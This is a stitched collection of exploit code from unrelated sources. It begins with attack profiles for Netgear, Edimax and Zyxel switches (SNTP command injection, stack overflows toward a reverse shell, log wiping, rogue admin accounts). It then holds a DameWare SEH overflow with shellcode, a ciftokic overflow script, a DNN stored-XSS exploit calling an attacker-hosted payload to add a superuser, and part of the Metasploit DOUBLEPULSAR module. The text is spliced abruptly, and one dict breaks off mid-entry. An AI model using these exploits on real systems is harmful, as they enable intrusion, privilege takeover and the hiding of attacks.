'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,# SIGSEGV ?
'workaround':True,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
}, 

#
# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':False,# My LAB workaround
#'stack':False, # False = use Heap, and there are no ASLR
'stack':True, # False = use Heap, and there are no ASLR
'vulnerable': True,
'safe': True
},

},
},

'Netgear': { 
'vendor': 'NETGEAR Inc.',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':True,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_settings',
'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_settings',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
'clean_logfile_query':'{"":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
'clean_logmem_query':'{"":{}}',
'vulnerable': False,
'safe': True
},
# Verify lacking authentication
'verify': { 
'set.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': True # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'md5',
'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
'vulnerable': False,
'safe': True
}, 
'sntp': {
#
# Most probably it is vulnerable
#
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
'stack_cgi_diag': {# Not vulnerable 
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',

'log_settings_set_cmd':'',# Disable Logging CMD
'log_settings_set_SIGSEGV':True,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'',# Clean RAM CMD
'log_ramClear_SIGSEGV':True,# Clean RAM SIGSEGV ?

'log_fileClear_cmd':'',# Clean FILE log CMD
'log_fileClear_SIGSEGV':True,# Clean FILE log SIGSEGV ?
# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
'log_settings_set':0x00,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
'log_ramClear':0x00,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
'log_fileClear':0x00,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)

'workaround':False,# My LAB workaround
'verify_uri':'',
'vulnerable': False,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',

'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=139',# CMD

'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',# Enable CMD
'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',# Disable CMD
'sys_timeSettings_set_SIGSEGV': True,# SIGSEGV ?
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
'sys_timeSntp_set':0x00,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x00,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x00,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)

'workaround':False,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
}, 
#
# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True, # False = use Heap, and there are no ASLR

'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x00,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x00,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap

'workaround':False,# My LAB workaround
'vulnerable': False,
'safe': True
},

},
},

'Edimax': { 
'vendor': 'EDIMAX Technology Co., Ltd.',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':False,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_global',
'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_global',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
'vulnerable': True,
'safe': True
},
# Verify lacking authentication
'verify': { 
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
'content_check':'1',
'vulnerable': True,
'safe': True
},
'set.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
#'encryption':'nopassword',
#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
'vulnerable': True,
'safe': True
}, 
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_time',
'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_time',
'inject_uri':'/cgi/set.cgi?cmd=sys_time',
'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_time',
'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_time',
'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,

'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_ping_post_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True

},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',

#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',# Enable Logging CMD
'log_settings_set_cmd':'&empty=1',# Disable Logging CMD
'log_settings_set_SIGSEGV':True,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'&target=0',# Clean RAM CMD
'log_ramClear_SIGSEGV':True,# Clean RAM SIGSEGV ?

'log_fileClear_cmd':'&target=1',# Clean FILE log CMD
'log_fileClear_SIGSEGV':True,# Clean FILE log SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',

'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',# CMD

'sys_timeSettings_set_cmd_enable':'&sntp=1',# Enable CMD
'sys_timeSettings_set_cmd_disable':'&sntp=0',# Disable CMD
'sys_timeSettings_set_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
}, 
#
# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True, # False = use Heap, and there are no ASLR
'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},

},
},

'Zyxel': {
'vendor': 'Zyxel Communications Corp.',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'encode',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=4353',
'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_4364=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
# Verify lacking authentication
'verify': {
'dispatcher.cgi': { # 'username' also suffer from heap overflow

#!/usr/bin/env python
# Author: Xavi Beltran
# Contact: xavibeltran@protonmail.com
# Exploit Development: https://xavibel.com/2019/08/31/seh-based-local-buffer-overflow-dameware-remote-support-v-12-1-0-34/
# Date: 14/7/2019

# Description:
#           SEH based Buffer Overflow
#DameWare Remote Support V. 12.1.0.34
#           Tools >> Computer Comments >> Description

# msf-pattern_offset -q "37694136" -l 5000
# [*] Exact match at offset 260
junk1 = "\x41" * 260

# Unicode compatible padding
nseh  = "\x61\x43"

# 0x007a0021 : pop esi # pop edi # ret
# startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [DNTU.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v12.1.0.34 (C:\Program Files\SolarWinds\DameWare Remote Support\DNTU.exe)
seh   = "\x21\x7a"

# Put shellcode memory address in EAX, push it to the stack and RETN
# 20 bytes
align  = ""
align += "\x43" * 10                # Padding
align += "\x58"                     # POP EAX
align += "\x73"                     # Venetian padding
# 0012F590   83C0 50          ADD EAX,50
align += u"\uC083" + "\x50"         # ADD EAX, 50
align += "\x73"                     # Venetian padding
align += "\x50"                     # PUSH EAX
align += "\x73"                     # Venetian padding
align +=  u'\uC3C3'                 # RETN

# 1348
junk2 = "\x43" * 18

# 7FFDD066 + 2 memory address contains the value FFFF0000
# This value is going to be placed in EBX 
# And it doesn't break the execution flow
junk3 = "\x44" * 550 + u"\uD066" + u"\u7FFD" # u"\xF0FF"

# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
# ./alpha2 eax --unicode --uppercase < shellcode.raw
# 508 bytes
shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"

crash = junk1 + nseh + seh + align + junk2 + shellcode + junk3

print(crash)

# Exploit Title: Ciftokic 2.4a - DoS Buffer Overflow
# Date: September 30, 2019
# Exploit Author: @JosueEncinar
# Software Link: http://launchpad.net/ubuntu/+source/kic/2.4a-1
# Version: 2.4a 
# Tested on: Ubuntu 18.04

'''
If we check the ciftokic.c file on line 52 we see the following code: char CIFFile[81], *Tmp;.  
In line 84 we have the problem with the following instruction: strcpy(CIFFile,argv[1]);

If the first argument is 80 characters or less, nothing happens, but if we put from 81 onwards the program fails with a Buffer Overflow.
'''

# To test the code use Python 3.6+
from os import system
from sys import argv


def print_usage():
    print("Usage: python3 ciftokic_overflow.py <characters_numbers>")
    print("      |_No Buffer Overflow: python3 ciftokic_overflow.py 80")
    print("      |_Buffer Overflow: python3 ciftokic_overflow.py 81")

if len(argv) == 1:
    print_usage()
else:
    try:
        number = int(argv[1])
        payload = "J"*number
        system(f"ciftokic {payload}")
    except:
        print_usage()


"""

Output Example:

josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 80
Error: can't read CIF input file JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 81
*** buffer overflow detected ***: ciftokic terminated
Aborted (core dumped)

"""

# Exploit Title: Stored Cross-Site Scripting in DotNetNuke (DNN) Version before 9.4.0
# Exploit Description : This exploit will add a superuser to target DNN website. 
# Exploit Condition : Successful exploitation occurs when an admin user visits a notification page.
# Exploit Author: MAYASEVEN
# CVE : CVE-2019-12562 (https://www.cvedetails.com/cve/CVE-2019-12562/)
# Github : https://github.com/MAYASEVEN/CVE-2019-12562
# Website : https://mayaseven.com

import urllib.request
from bs4 import BeautifulSoup

####################################################################################################
################################## Config the variables here #######################################
####################################################################################################
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "research@mayaseven.com" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
#####################################################################################################
#####################################################################################################
#####################################################################################################

# Payload to add a superuser to website
PAYLOAD = "John<script src='"+LISTEN_URL+"/payload.js'></script>"
FILE_CONTENT = """var token = document.getElementsByName("__RequestVerificationToken")[0].value;
var xhttp = new XMLHttpRequest();
var params = "{'firstName':'"""+USERNAME+"""','lastName':'"""+USERNAME+"""','email':'"""+EMAIL+"""','userName':'"""+USERNAME+"""','password':'"""+PASSWORD+"""','question':'','answer':'','randomPassword':false,'authorize':true,'notify':false}";
xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
        var returnhttp1 = new XMLHttpRequest();
        returnhttp1.open("GET", '"""+LISTEN_URL+"""/Added_the_user');
        returnhttp1.send();
        var xhttp2 = new XMLHttpRequest();
        var userId = JSON.parse(xhttp.responseText).userId;
        xhttp2.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                var returnhttp2 = new XMLHttpRequest();
                returnhttp2.open("GET", '"""+LISTEN_URL+"""/Make_superuser_success');
                returnhttp2.send();
            }
        }
        xhttp2.open('POST', '"""+TARGET_URL+"""/API/PersonaBar/Users/UpdateSuperUserStatus?userId='+userId+'&setSuperUser=true', true);
        xhttp2.setRequestHeader('Content-type', 'application/json; charset=UTF-8');
        xhttp2.setRequestHeader('RequestVerificationToken', token);
        xhttp2.send(params);
    }
};
xhttp.open('POST', '"""+TARGET_URL+"""/API/PersonaBar/Users/CreateUser', true);
xhttp.setRequestHeader('Content-type', 'application/json; charset=UTF-8');
xhttp.setRequestHeader('RequestVerificationToken', token);
xhttp.send(params);
"""

def create_payload():
    # Create a payload.js file
    f = open("payload.js", "w")
    f.write(FILE_CONTENT)
    f.close()

def check_target():
    global regpage
    reg = urllib.request.urlopen(TARGET_URL+"/Register")
    regpage = reg.read().decode("utf8")
    reg.close()
    if "dnn" in regpage:
       return True
    else: return False

def exploit():
    # Fetching parameter from regpage
    soup = BeautifulSoup(regpage, 'html.parser')
    formhtml = soup.find("div", {"id": "dnn_ctr_Register_userForm"})
    inputdata = BeautifulSoup(regpage, 'html.parser').findAll("input")
    param = {}
    print(" [+] Fetching DNN random parameter name.")
    for i in soup.select('input[name*="_TextBox"]'):
        print(" [+]", i["aria-label"],":", i["name"])
        param[i["aria-label"]] = i["name"]
    ScriptManager = "dnn$ctr$Register_UP|dnn$ctr$Register$registerButton"
    __EVENTVALIDATION = soup.find("input", {"id": "__EVENTVALIDATION"})["value"]
    __VIEWSTATE = soup.find("input", {"id": "__VIEWSTATE"})["value"]
    __EVENTTARGET = "dnn$ctr$Register$registerButton"

    # Posting data to target
    headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8'}
    data = {'ScriptManager': ScriptManager, '__EVENTVALIDATION': __EVENTVALIDATION, '__VIEWSTATE': __VIEWSTATE, '__EVENTTARGET': __EVENTTARGET,
        param['Username']: "dummy_"+USERNAME, param["Password"]: PASSWORD, param["PasswordConfirm"]: PASSWORD, param["DisplayName"]: PAYLOAD, "dummy_"+param["Email"]: EMAIL, '__ASYNCPOST': 'true'}
    data = urllib.parse.urlencode(data).encode()
    req = urllib.request.Request(TARGET_URL+"/Register", data=data, headers=headers)
    response = urllib.request.urlopen(req)
    if "An email with your details has been sent to the Site Administrator" in response.read().decode("utf8"):
        create_payload()
        return True
    elif "A user already exists" in response.read().decode("utf8"):
        print(" [!] The user already exists")
        return False 
    elif "The Display Name is invalid." in response.read().decode("utf8"):
        print(" [!] DotNetNuke verion already been patched")
    else: return False

def main():
    print("[ Checking the target ]")
    if(check_target()):
        print(" [+] Target is DNN website.")
        print(" [+] URL: %s" % TARGET_URL)
    else:
        print(" [!] Target is not DNN website and exploit will not working.")
        return
    print("[ Running an exploit ]")
    if(exploit()):
        print("[ Successful exploited the target ]")
        print("> Creating a payload.js file in current directory.")
        print("> You have to serve the web server and place payload.js on it.")
        print("> And waiting admin to open a notification then the user will be added.")
        print("> Username: %s" % USERNAME)
        print("> Password: %s" % PASSWORD)
    else:
        print(" [!] Failed to exploit the target.")
        return

if(__name__ == "__main__"):
    main()

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client

  MAX_SHELLCODE_SIZE = 4096

  def initialize(info = {})
    super(update_info(info,
'Name'             => 'DOUBLEPULSAR Payload Execution and Neutralization',
'Description'      => %q{
        This module executes a Metasploit payload against the Equation Group's
        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.

        While this module primarily performs code execution against the implant,
        the "Neutralize implant" target allows you to disable the implant.
      },
'Author'           => [
'Equation Group', # DOUBLEPULSAR implant
'Shadow Brokers', # Equation Group dump
'zerosum0x0',     # DOPU analysis and detection
'Luke Jennings',  # DOPU analysis and detection
'wvu',            # Metasploit module and arch detection
'Jacob Robles'    # Metasploit module and RCE help
      ],
'References'       => [
        ['MSB', 'MS17-010'],
        ['CVE', '2017-0143'],
        ['CVE', '2017-0144'],
        ['CVE', '2017-0145'],
        ['CVE', '2017-0146'],
        ['CVE', '2017-0147'],
        ['CVE', '2017-0148'],
        ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],
        ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],
        ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],
        ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
        ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
        ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
      ],
'DisclosureDate'   => '2017-04-14',
'License'          => MSF_LICENSE,
'Platform'         => 'win',
'Arch'             => ARCH_X64,
'Privileged'       => true,
'Payload'          => {
'Space'          => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
'DisableNops'    => true
      },
'Targets'          => [
        ['Execute payload',    {}],
        ['Neutralize implant', {}]
      ],
'DefaultTarget'    => 0,
'DefaultOptions'   => {
'EXITFUNC'       => 'thread',
'PAYLOAD'        => 'windows/x64/meterpreter/reverse_tcp'
      },
'Notes'            => {
'AKA'            => ['DOUBLEPULSAR'],
'RelatedModules' => [
'auxiliary/scanner/smb/smb_ms17_010',
'exploit/windows/smb/ms17_010_eternalblue'
        ],
'Stability'      => [CRASH_SAFE],
'Reliability'    => [REPEATABLE_SESSION]
      }
    ))

    register_advanced_options([
      OptBool.new('DefangedMode',  [true, 'Run in defanged mode', true]),
      OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])
    ])
  end

